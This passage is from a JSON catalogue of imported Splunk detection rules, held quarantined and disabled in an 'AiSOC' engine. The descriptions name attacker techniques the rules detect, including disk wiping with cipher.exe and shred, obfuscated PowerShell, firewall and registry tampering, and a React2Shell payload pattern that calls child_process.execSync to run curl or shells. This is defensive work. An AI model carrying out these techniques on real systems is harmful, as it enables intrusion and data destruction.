"splunk/security_content", "source_id": "cd5aed7e-5cea-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wbadmin_delete_system_backups.yml" } }, { "id": "splunk-security-content-cd6d7410-9146-4471-a418-49edba6dadc4", "type": "detection", "name": "Windows Modify System Firewall with Notable Process Path", "description": "The following analytic detects suspicious modifications to system firewall rules, specifically allowing execution of applications from notable and potentially malicious file paths. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving firewall rule changes. This activity is significant as it may indicate an adversary attempting to bypass firewall restrictions to execute malicious files. If confirmed malicious, this could allow attackers to execute unauthorized code, potentially leading to further system compromise, data exfiltration, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-system-firewall-with-notable-process-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd6d7410-9146-4471-a418-49edba6dadc4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_system_firewall_with_notable_process_path.yml" } }, { "id": "splunk-security-content-cd80a6ac-c9d9-11eb-8839-acde48001122", "type": "detection", "name": "Clear Unallocated Sector Using Cipher App", "description": "The following analytic detects the execution of `cipher.exe` with the `/w` flag to clear unallocated sectors on a disk. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line arguments, and parent processes. This activity is significant because it is a technique used by ransomware to prevent forensic recovery of deleted files. If confirmed malicious, this action could hinder incident response efforts by making it impossible to recover critical data, thereby complicating the investigation and remediation process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/clear-unallocated-sector-using-cipher-app.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cd80a6ac-c9d9-11eb-8839-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/clear_unallocated_sector_using_cipher_app.yml" } }, { "id": "splunk-security-content-cda04e9c-1950-43ab-87d6-e333a3d7f107", "type": "detection", "name": "Linux Suspicious React or Next.js Child Process", "description": "This analytic detects Linux processes such as sh, bash, and common Linux LOLBINs being spawned by React or Next.js application servers.\nIn the context of CVE-2025-55182 / React2Shell / CVE-2025-66478 for Next.js, successful exploitation can lead to arbitrary JavaScript execution on the server, which in turn is commonly used to invoke Node's child_process APIs (for example child_process.execSync) to run OS-level commands.\nPublic proof-of-concept payloads and observed in-the-wild exploit traffic show patterns where the vulnerable React Server Components handler triggers process.mainModule.require('child_process').execSync() to execute binaries such as ping, curl, or arbitrary shells on the underlying host.\nThis detection focuses on suspicious child processes where a Next/React server process spawns an uncommon process.\nSuch activity might be a strong indicator of exploitation of the aforementioned vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-suspicious-react-or-next-js-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cda04e9c-1950-43ab-87d6-e333a3d7f107", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_suspicious_react_or_next_js_child_process.yml" } }, { "id": "splunk-security-content-cde00c31-042a-4307-bf70-25e471da56e9", "type": "detection", "name": "Windows New Service Security Descriptor Set Via Sc.EXE", "description": "The following analytic detects changes in a service security descriptor.\nIt leverages data from Endpoint Detection and Response (EDR) agents, specifically searching for any process execution involving the \"sc.exe\" binary with the \"sdset\" flag targeting any service.\nThis behavior can be legitimate, such as when a user or administrator is configuring a service's security settings.\nInvestigate appropariate services to determine if the behavior is malicious.\nIf confirmed malicious, this could allow an attacker to escalate their privileges, blind defenses and more.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-service-security-descriptor-set-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cde00c31-042a-4307-bf70-25e471da56e9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_service_security_descriptor_set_via_sc_exe.yml" } }, { "id": "splunk-security-content-cde75cf6-3c7a-4dd6-af01-27cdb4511fd4", "type": "detection", "name": "Malicious PowerShell Process With Obfuscation Techniques", "description": "The following analytic detects PowerShell processes launched with command-line arguments indicative of obfuscation techniques. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and complete command-line executions. This activity is significant because obfuscated PowerShell commands are often used by attackers to evade detection and execute malicious scripts. If confirmed malicious, this activity could lead to unauthorized code execution, privilege escalation, or persistent access within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/malicious-powershell-process-with-obfuscation-techniques.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cde75cf6-3c7a-4dd6-af01-27cdb4511fd4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/malicious_powershell_process_with_obfuscation_techniques.yml" } }, { "id": "splunk-security-content-ce058d6c-79f2-11ec-b476-acde48001122", "type": "detection", "name": "Ping Sleep Batch Command", "description": "The following analytic identifies the execution of ping sleep batch commands.\nIt leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process command-line details.\nThis activity is significant as it indicates an attempt to delay malicious code execution, potentially evading detection or sandbox analysis.\nIf confirmed malicious, this technique allows attackers to bypass security measures, making it harder to detect and analyze their activities, thereby increasing the risk of prolonged unauthorized access and potential data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ping-sleep-batch-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce058d6c-79f2-11ec-b476-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/ping_sleep_batch_command.yml" } }, { "id": "splunk-security-content-ce1c0e2b-9303-4903-818b-0d9002fc6ea4", "type": "detection", "name": "AWS Defense Evasion PutBucketLifecycle", "description": "The following analytic detects `PutBucketLifecycle` events in AWS CloudTrail logs where a user sets a lifecycle rule for an S3 bucket with an expiration period of fewer than three days. This detection leverages CloudTrail logs to identify suspicious lifecycle configurations. This activity is significant because attackers may use it to delete CloudTrail logs quickly, thereby evading detection and impairing forensic investigations. If confirmed malicious, this could allow attackers to cover their tracks, making it difficult to trace their actions and respond to the breach effectively.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485.001", "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-putbucketlifecycle.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce1c0e2b-9303-4903-818b-0d9002fc6ea4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_putbucketlifecycle.yml" } }, { "id": "splunk-security-content-ce245717-779b-483b-bc52-fc7a94729973", "type": "detection", "name": "Windows Chromium Process with Disabled Extensions", "description": "The following analytic detects instances of Chromium-based browser processes on Windows launched with extensions explicitly disabled via command-line arguments. Disabling extensions can be used by automation frameworks, testing tools, or headless browser activity, but may also indicate defense evasion or abuse of browser functionality by malicious scripts or malware. This behavior reduces browser visibility and bypasses user-installed security extensions, making it relevant for detecting non-interactive execution, suspicious automation, or living-off-the-land techniques. Analysts should validate execution context, parent process, and command-line parameters to determine legitimacy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1497" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-chromium-process-with-disabled-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce245717-779b-483b-bc52-fc7a94729973", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_chromium_process_with_disabled_extensions.yml" } }, { "id": "splunk-security-content-ce27646e-d411-11eb-8a00-acde48001122", "type": "detection", "name": "Allow File And Printing Sharing In Firewall", "description": "The following analytic detects the modification of firewall settings to allow file and printer sharing. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving 'netsh' commands that enable file and printer sharing. This activity is significant because it can indicate an attempt by ransomware to discover and encrypt files on additional machines connected to the compromised host. If confirmed malicious, this could lead to widespread file encryption across the network, significantly increasing the impact of a ransomware attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/allow-file-and-printing-sharing-in-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce27646e-d411-11eb-8a00-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/allow_file_and_printing_sharing_in_firewall.yml" } }, { "id": "splunk-security-content-ce2bde4d-a1d4-4452-8c87-98440e5adfb3", "type": "detection", "name": "Linux Auditd Shred Overwrite Command", "description": "The following analytic detects the execution of the 'shred' command on a Linux machine, which is used to overwrite files to make them unrecoverable. It leverages data from Linux Auditd, focusing on process names and command-line arguments. This activity is significant because the 'shred' command can be used in destructive attacks, such as those seen in the Industroyer2 malware targeting energy facilities. If confirmed malicious, this activity could lead to the permanent destruction of critical files, severely impacting system integrity and data availability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-shred-overwrite-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce2bde4d-a1d4-4452-8c87-98440e5adfb3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_shred_overwrite_command.yml" } }, { "id": "splunk-security-content-ce5a0962-849f-4720-a678-753fe6674479", "type": "detection", "name": "Prohibited Network Traffic Allowed", "description": "The following analytic detects instances where network traffic, identified by port and transport layer protocol as prohibited in the \"lookup_interesting_ports\" table, is allowed. It uses the Network_Traffic data model to cross-reference traffic data against predefined security policies. This activity is significant for a SOC as it highlights potential misconfigurations or policy violations that could lead to unauthorized access or data exfiltration. If confirmed malicious, this could allow attackers to bypass network defenses, leading to potential data breaches and compromising the organization's security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/prohibited-network-traffic-allowed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce5a0962-849f-4720-a678-753fe6674479", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/prohibited_network_traffic_allowed.yml" } }, { "id": "splunk-security-content-ce633e56-25b2-11ec-9e76-acde48001122", "type": "detection", "name": "Suspicious Copy on System32", "description": "The following analytic detects potentially suspicious file copy operations targeting the\nSystem32 or SysWow64 directories as source, often indicative of malicious activity.\nIt leverages data from Endpoint Detection and Response (EDR) agents,\nfocusing on activity initiated by command-line tools like cmd.exe or PowerShell.\nThis behavior is significant as it may indicate an attempt to evade defenses by copying\nan existing binary from the system directory and renaming it.\nIf confirmed malicious, this activity could allow an attacker to execute\ncode undetected and potentially leading to system compromise or further lateral movement\nwithin the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-copy-on-system32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ce633e56-25b2-11ec-9e76-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_copy_on_system32.yml" } }, { "id": "splunk-security-content-ceaed840-56b3-4a70-b8e1-d762b1c5c08c", "type": "detection", "name": "Windows RDP Connection Successful", "description": "The following analytic detects successful Remote Desktop Protocol (RDP) connections by monitoring EventCode 1149 from the Windows TerminalServices RemoteConnectionManager Operational log. This detection is significant as successful RDP connections can indicate remote access to a system, which may be leveraged by attackers to control or exfiltrate data. If confirmed malicious, this activity could lead to unauthorized access, data theft, or further lateral movement within the network. Monitoring successful RDP connections is crucial for identifying potential security breaches and mitigating risks promptly.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1563.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-connection-successful.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ceaed840-56b3-4a70-b8e1-d762b1c5c08c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_connection_successful.yml" } }, { "id": "splunk-security-content-ced50492-8849-11ec-9f68-acde48001122", "type": "detection", "name": "Windows Remote Assistance Spawning Process", "description": "The following analytic detects Microsoft Remote Assistance (msra.exe) spawning PowerShell.exe or cmd.exe as a child process. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where msra.exe is the parent process. This activity is significant because msra.exe typically does not spawn command-line interfaces, indicating potential process injection or misuse. If confirmed malicious, an attacker could use this technique to execute arbitrary commands, escalate privileges, or maintain persistence on the compromised system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-assistance-spawning-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ced50492-8849-11ec-9f68-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_assistance_spawning_process.yml" } }, { "id": "splunk-security-content-cee573a0-7587-48e6-ae99-10e8c657e89a", "type": "detection", "name": "Windows Modify Registry Disable Restricted Admin", "description": "The following analytic detects modifications to the Windows registry entry \"DisableRestrictedAdmin,\" which controls the Restricted Admin mode behavior. This detection leverages registry activity logs from endpoint data sources like Sysmon or Carbon Black. Monitoring this activity is crucial as changes to this setting can disable a security feature that limits credential exposure during remote connections. If confirmed malicious, an attacker could weaken security controls, increasing the risk of credential theft and unauthorized access to sensitive systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-restricted-admin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cee573a0-7587-48e6-ae99-10e8c657e89a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_restricted_admin.yml" } }, { "id": "splunk-security-content-cf056b65-44b2-4d32-9172-d6b6f081a376", "type": "detection", "name": "Windows Account Discovery With NetUser PreauthNotRequire", "description": "The following analytic detects the execution of the PowerView PowerShell cmdlet Get-NetUser with the -PreauthNotRequire parameter, leveraging Event ID 4104. This method identifies attempts to query Active Directory user accounts that do not require Kerberos preauthentication. Monitoring this activity is crucial as it can indicate reconnaissance efforts by an attacker to identify potentially vulnerable accounts. If confirmed malicious, this behavior could lead to further exploitation, such as unauthorized access or privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-account-discovery-with-netuser-preauthnotrequire.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cf056b65-44b2-4d32-9172-d6b6f081a376", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_account_discovery_with_netuser_preauthnotrequire.yml" } }, { "id": "splunk-security-content-cf06a0ee-ffa9-4ed3-be77-0670ed9bab52", "type": "detection", "name": "Windows Unusual Count Of Users Remotely Failed To Auth From Host", "description": "The following analytic identifies a source host failing to authenticate against a remote host with multiple users, potentially indicating a Password Spraying attack. It leverages Windows Event 4625 (failed logon attempts) and Logon Type 3 (remote authentication) to detect this behavior. This activity is significant as it may represent an adversary attempting to gain initial access or elevate privileges within an Active Directory environment. If confirmed malicious, this could lead to unauthorized access, privilege escalation, and further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-users-remotely-failed-to-auth-from-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cf06a0ee-ffa9-4ed3-be77-0670ed9bab52", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_users_remotely_failed_to_auth_from_host.yml" } }, { "id": "splunk-security-content-cf192860-2d94-40db-9a51-c04a2e8a8f8b", "type": "detection", "name": "Windows WMI Impersonate Token", "description": "The following analytic detects potential WMI token impersonation activities in a process or command. It leverages Sysmon EventCode 10 to identify instances where `wmiprvse.exe` has a duplicate handle or full granted access in a target process. This behavior is significant as it is commonly used by malware like Qakbot for privilege escalation or defense evasion. If confirmed malicious, this activity could allow an attacker to gain elevated privileges, evade defenses, and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmi-impersonate-token.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cf192860-2d94-40db-9a51-c04a2e8a8f8b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmi_impersonate_token.yml" } }, { "id": "splunk-security-content-cf8d753e-a8fe-11eb-8f58-acde48001122", "type": "detection", "name": "Icacls Deny Command", "description": "The following analytic detects instances where an adversary modifies\nsecurity permissions of a file or directory using commands like \"icacls.exe\", \"cacls.exe\",\nor \"xcacls.exe\" with deny options. It leverages data from Endpoint Detection and\nResponse (EDR) agents, focusing on process names and command-line executions. This\nactivity is significant as it is commonly used by Advanced Persistent Threats (APTs)\nand coinminer scripts to evade detection and impede access to critical files. If\nconfirmed malicious, this could allow attackers to maintain persistence and hinder\nincident response efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/icacls-deny-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cf8d753e-a8fe-11eb-8f58-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/icacls_deny_command.yml" } }, { "id": "splunk-security-content-cfa7b9ac-43f0-11ec-9b48-acde48001122", "type": "detection", "name": "Windows InstallUtil Uninstall Option", "description": "The following analytic detects the use of the Windows InstallUtil.exe binary with the `/u` (uninstall) switch, which can execute code while bypassing application control. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because it can indicate an attempt to execute malicious code without administrative privileges. If confirmed malicious, an attacker could achieve code execution, potentially leading to further system compromise or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-installutil-uninstall-option.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cfa7b9ac-43f0-11ec-9b48-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_installutil_uninstall_option.yml" } }, { "id": "splunk-security-content-cfe094b4-0737-4a33-9d63-e0562ce2b883", "type": "detection", "name": "ESXi Bulk VM Termination", "description": "This detection identifies when all virtual machines on an ESXi host are abruptly terminated, which may indicate malicious activity such as a deliberate denial-of-service, ransomware staging, or an attempt to destroy critical workloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1673", "T1529", "T1499" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-bulk-vm-termination.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cfe094b4-0737-4a33-9d63-e0562ce2b883", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_bulk_vm_termination.yml" } }, { "id": "splunk-security-content-cfe7cca7-2746-4bdf-b712-b01ed819b9de", "type": "detection", "name": "Cloud Security Groups Modifications by User", "description": "The following analytic identifies unusual modifications to security groups in your cloud environment by users, focusing on actions such as modifications, deletions, or creations over 30-minute intervals. It leverages cloud infrastructure logs and calculates the standard deviation for each user, using the 3-sigma rule to detect anomalies. This activity is significant as it may indicate a compromised account or insider threat. If confirmed malicious, attackers could alter security group configurations, potentially exposing sensitive resources or disrupting services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1578.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-security-groups-modifications-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "cfe7cca7-2746-4bdf-b712-b01ed819b9de", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_security_groups_modifications_by_user.yml" } }, { "id": "splunk-security-content-d0026380-b3c4-4da0-ac8e-02790063ff6b", "type": "detection", "name": "Windows Command and Scripting Interpreter Hunting Path Traversal", "description": "The following analytic identifies path traversal command-line executions,\nleveraging data from Endpoint Detection and Response (EDR) agents. It detects patterns\nin command-line arguments indicative of path traversal techniques, such as multiple\ninstances of \"/..\", \"\\..\", or \"\\\\..\". This activity is significant as it often indicates\nattempts to evade defenses by executing malicious code, such as through msdt.exe.\nIf confirmed malicious, this behavior could allow attackers to execute arbitrary\ncode, potentially leading to system compromise, data exfiltration, or further lateral\nmovement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-command-and-scripting-interpreter-hunting-path-traversal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0026380-b3c4-4da0-ac8e-02790063ff6b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_command_and_scripting_interpreter_hunting_path_traversal.yml" } }, { "id": "splunk-security-content-d0434864-b043-41e3-8c08-30e53605e9cb", "type": "detection", "name": "Windows SQL Server Critical Procedures Enabled", "description": "This detection identifies when critical SQL Server configuration options are modified, including \"Ad Hoc Distributed Queries\", \"external scripts enabled\", \"Ole Automation Procedures\", \"clr enabled\", and \"clr strict security\". These features can be abused by attackers for various malicious purposes - Ad Hoc Distributed Queries enables Active Directory reconnaissance through ADSI provider, external scripts and Ole Automation allow execution of arbitrary code, and CLR features can be used to run custom assemblies. Enabling these features could indicate attempts to gain code execution or perform reconnaissance through SQL Server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-server-critical-procedures-enabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "d0434864-b043-41e3-8c08-30e53605e9cb", "source_commit": "4d4c7ee", 